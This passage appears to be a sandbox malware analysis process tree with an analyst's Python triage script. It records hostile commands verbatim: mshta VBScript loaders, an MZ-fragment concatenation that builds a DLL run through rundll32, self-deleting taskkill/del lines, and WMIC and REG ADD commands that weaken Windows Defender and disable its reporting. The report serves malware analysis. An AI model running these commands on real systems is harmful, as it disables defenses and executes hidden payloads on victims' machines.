C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1836,16174753072799228854,7979593101972217869,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2604 /prefetch:18⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1836,16174753072799228854,7979593101972217869,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2612 /prefetch:18⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1836,16174753072799228854,7979593101972217869,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=2 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:18⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1836,16174753072799228854,7979593101972217869,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3736 /prefetch:18⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1836,16174753072799228854,7979593101972217869,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4544 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1836,16174753072799228854,7979593101972217869,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4672 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1836,16174753072799228854,7979593101972217869,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4792 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1836,16174753072799228854,7979593101972217869,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5184 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1836,16174753072799228854,7979593101972217869,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4748 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1836,16174753072799228854,7979593101972217869,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3508 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1836,16174753072799228854,7979593101972217869,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5064 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1836,16174753072799228854,7979593101972217869,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3472 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1836,16174753072799228854,7979593101972217869,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5020 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1836,16174753072799228854,7979593101972217869,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5132 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1836,16174753072799228854,7979593101972217869,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3328 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1836,16174753072799228854,7979593101972217869,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2456 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1836,16174753072799228854,7979593101972217869,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5328 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1836,16174753072799228854,7979593101972217869,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1928 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1836,16174753072799228854,7979593101972217869,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3472 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1836,16174753072799228854,7979593101972217869,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=3240 /prefetch:28⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C taskkill /F /PID 6940 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\9vdLMR_KRufvVeHAUGxsmK2M.exe"7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /PID 69408⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C taskkill /F /PID 6940 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\9vdLMR_KRufvVeHAUGxsmK2M.exe"7⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /PID 69408⤵
- Kills process with taskkill
-
C:\Users\Admin\Documents\2QVnL8iMDBxYq_KKT0wC2R1_.exe"C:\Users\Admin\Documents\2QVnL8iMDBxYq_KKT0wC2R1_.exe"6⤵
-
C:\Users\Admin\Documents\qZoZQmuBZAOy9fCmUYIULVvZ.exe"C:\Users\Admin\Documents\qZoZQmuBZAOy9fCmUYIULVvZ.exe"6⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe8⤵
- Kills process with taskkill
-
C:\Users\Admin\Documents\eBqlYF_PlHp_DgWOTWFkdGSM.exe"C:\Users\Admin\Documents\eBqlYF_PlHp_DgWOTWFkdGSM.exe"6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im eBqlYF_PlHp_DgWOTWFkdGSM.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\eBqlYF_PlHp_DgWOTWFkdGSM.exe" & del C:\ProgramData\*.dll & exit7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im eBqlYF_PlHp_DgWOTWFkdGSM.exe /f8⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 68⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Documents\Kv3g56bKQrQk61SCbRan35Er.exe"C:\Users\Admin\Documents\Kv3g56bKQrQk61SCbRan35Er.exe"6⤵
-
C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"7⤵
- Checks computer location settings
-
C:\Users\Admin\Documents\f2VWkkeepL4LqeyAmo1wo_yz.exe"C:\Users\Admin\Documents\f2VWkkeepL4LqeyAmo1wo_yz.exe"8⤵
-
C:\Users\Admin\Documents\K3eB8P7WT3zzB0mOxy7gzfH0.exe"C:\Users\Admin\Documents\K3eB8P7WT3zzB0mOxy7gzfH0.exe"8⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe9⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe10⤵
- Kills process with taskkill
-
C:\Users\Admin\Documents\Z7G064Ykp6b8nPZ3PHwQSiXK.exe"C:\Users\Admin\Documents\Z7G064Ykp6b8nPZ3PHwQSiXK.exe"8⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\Z7G064Ykp6b8nPZ3PHwQSiXK.exe"C:\Users\Admin\Documents\Z7G064Ykp6b8nPZ3PHwQSiXK.exe"9⤵
-
C:\Users\Admin\Documents\kizRNzMegzbl8oHFYZN_OKq4.exe"C:\Users\Admin\Documents\kizRNzMegzbl8oHFYZN_OKq4.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\tmp6180_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp6180_tmp.exe"9⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\tmp6180_tmp.exeC:\Users\Admin\AppData\Local\Temp\tmp6180_tmp.exe10⤵
-
C:\Users\Admin\Documents\hqQhjiMzGy5O7q3zHm8d2Nwp.exe"C:\Users\Admin\Documents\hqQhjiMzGy5O7q3zHm8d2Nwp.exe"8⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe(cReATEOBJecT ("WScRIPt.SHelL" ).RUn ("C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\Documents\hqQhjiMzGy5O7q3zHm8d2Nwp.exe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF """" == """" for %U In ( ""C:\Users\Admin\Documents\hqQhjiMzGy5O7q3zHm8d2Nwp.exe"" ) do taskkill -F -Im ""%~nXU"" ", 0, trUE) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\Documents\hqQhjiMzGy5O7q3zHm8d2Nwp.exe" SkVPVS3t6Y8W.EXe &&STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""== "" for %U In ( "C:\Users\Admin\Documents\hqQhjiMzGy5O7q3zHm8d2Nwp.exe" ) do taskkill -F -Im "%~nXU"10⤵
-
C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXeSkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK11⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe(cReATEOBJecT ("WScRIPt.SHelL" ).RUn ("C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""/phmOv~geMVZhd~P51OGqJQYYUK "" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" ) do taskkill -F -Im ""%~nXU"" ", 0, trUE) )12⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" SkVPVS3t6Y8W.EXe &&STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF "/phmOv~geMVZhd~P51OGqJQYYUK "== "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" ) do taskkill -F -Im "%~nXU"13⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBsCRipT:CloSE ( CReaTEoBJEct ( "WSCRIPT.SHElL" ). rUn("cMd /q /C eCHo | SET /P = ""MZ"" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ + 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM & StARt control .\FUEj5.QM " , 0 , tRuE ) )12⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /C eCHo | SET /P = "MZ" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ+ 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM& StARt control .\FUEj5.QM13⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHo "14⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>yW7bB.DeE"14⤵
-
C:\Windows\SysWOW64\control.execontrol .\FUEj5.QM14⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\FUEj5.QM15⤵
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\FUEj5.QM16⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\FUEj5.QM17⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill -F -Im "hqQhjiMzGy5O7q3zHm8d2Nwp.exe"11⤵
- Kills process with taskkill
-
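The hqQhjiMzGy5O7q3zHm8d2Nwp.exe chain above is a header-splitting loader: mshta runs an inline VBScript that spawns cmd, the "echo | SET /P = "MZ" > yW7bB.DeE" step is there to write the two-byte MZ magic with no trailing newline, "COpy /Y /b" concatenates that stub with five dropped fragments into FUEJ5.QM, and "control .\FUEj5.QM" hands the result to Shell32's Control_RunDLL, which ends with the 32-bit rundll32 loading it as a DLL (the "Loads dropped DLL" hit at the bottom of that chain). The point of the split is that no file written to disk before the copy step carries a complete PE header, so per-file scanning of the drops sees nothing executable. The Python below is an added example, not code from the report or from the sample: it parses the fragment order out of the copy command exactly as shown in the tree, rebuilds the file, and checks each fragment and the result for a PE header. The image it reassembles is a constructed stand-in (DOS header, PE signature, a few bytes of filler); the real fragments are not on this page.

```python
import re
import struct

# The dropper's cmd.exe step, copied from the process tree above.
COPY_CMDLINE = (
    r'cmd /q /C eCHo | SET /P = "MZ" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ'
    r' + 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM & StARt control .\FUEj5.QM'
)


def parse_copy_b(cmdline: str):
    """Return (sources, destination) of the 'copy /b A + B + ... DEST' part of a command line.

    Windows file names are case-insensitive (the tree shows yW7bB.DeE and YW7bB.DEe for the
    same file), so names are lower-cased for lookup.
    """
    m = re.search(r"\bcopy\s+(?:/\w\s+)*(.+?)\s+(\S+)\s*(?:&|$)", cmdline, re.IGNORECASE)
    if not m:
        raise ValueError("no copy command in command line")
    sources = [s.strip().lower() for s in m.group(1).split("+")]
    return sources, m.group(2).lower()


def looks_like_pe(data: bytes) -> bool:
    """Cheap PE sanity check: MZ magic, e_lfanew inside the buffer, PE signature at e_lfanew."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    return e_lfanew + 4 <= len(data) and data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def build_stub_pe() -> bytes:
    """Constructed stand-in for the rebuilt image (not the sample's payload)."""
    img = bytearray(0x80)                            # DOS header plus stub padding
    img[:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x80)          # e_lfanew: PE signature lives at 0x80
    img += b"PE\0\0" + struct.pack("<HH", 0x14C, 1)  # signature, Machine=i386, NumberOfSections=1
    img += b"\x00" * 16 + b"<section data>"
    return bytes(img)


def split_like_dropper(image: bytes, names):
    """Mimic the drop layout: the first file holds only 'MZ'; the rest of the image is spread
    over the remaining names, so no single file on disk carries a complete PE header."""
    rest, chunks = image[2:], len(names) - 1
    step = -(-len(rest) // chunks)                   # ceiling division
    parts = {names[0]: image[:2]}
    for i, name in enumerate(names[1:]):
        parts[name] = rest[i * step:(i + 1) * step]
    return parts


def reassemble(parts: dict, cmdline: str) -> bytes:
    """Concatenate the fragments in the order the copy /b command names them."""
    sources, _dest = parse_copy_b(cmdline)
    return b"".join(parts[name] for name in sources)


def triage(parts: dict, cmdline: str) -> dict:
    """Report whether the individual drops and the rebuilt file look like a PE image."""
    rebuilt = reassemble(parts, cmdline)
    _sources, dest = parse_copy_b(cmdline)
    return {
        "destination": dest,
        "fragments_with_pe_header": [n for n, b in parts.items() if looks_like_pe(b)],
        "rebuilt_is_pe": looks_like_pe(rebuilt),
        "rebuilt_size": len(rebuilt),
    }


if __name__ == "__main__":
    names, _ = parse_copy_b(COPY_CMDLINE)
    print(triage(split_like_dropper(build_stub_pe(), names), COPY_CMDLINE))
```

On a real case the fragments are the files the sample dropped next to SkVPVS3t6Y8W.EXe; feed those bytes in as the parts dict and the same copy command line from the tree, and the rebuilt FUEJ5.QM is what rundll32 loaded.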
C:\Users\Admin\Documents\PAPnQ3LBtB6qPfr5Zy6eTGRb.exe"C:\Users\Admin\Documents\PAPnQ3LBtB6qPfr5Zy6eTGRb.exe"8⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵
-
C:\Users\Admin\Documents\j33PZfVi2SJxBkQ8QMNJtRtd.exe"C:\Users\Admin\Documents\j33PZfVi2SJxBkQ8QMNJtRtd.exe" /mixtwo8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5432 -s 6489⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5432 -s 6609⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5432 -s 6849⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5432 -s 8009⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5432 -s 8809⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5432 -s 9289⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5432 -s 11769⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5432 -s 12449⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "j33PZfVi2SJxBkQ8QMNJtRtd.exe" /f & erase "C:\Users\Admin\Documents\j33PZfVi2SJxBkQ8QMNJtRtd.exe" & exit9⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "j33PZfVi2SJxBkQ8QMNJtRtd.exe" /f10⤵
- Kills process with taskkill
-
C:\Users\Admin\Documents\gK81cYZvQFyHCz4tPMFZfiO9.exe"C:\Users\Admin\Documents\gK81cYZvQFyHCz4tPMFZfiO9.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS573F.tmp\Install.exe.\Install.exe9⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS66C0.tmp\Install.exe.\Install.exe /S /site_id "668658"10⤵
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &11⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"12⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True14⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True15⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"12⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True13⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True14⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True15⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"12⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True14⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True15⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"12⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True14⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True15⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"11⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&12⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3213⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6413⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"11⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&12⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:3213⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:6413⤵
-
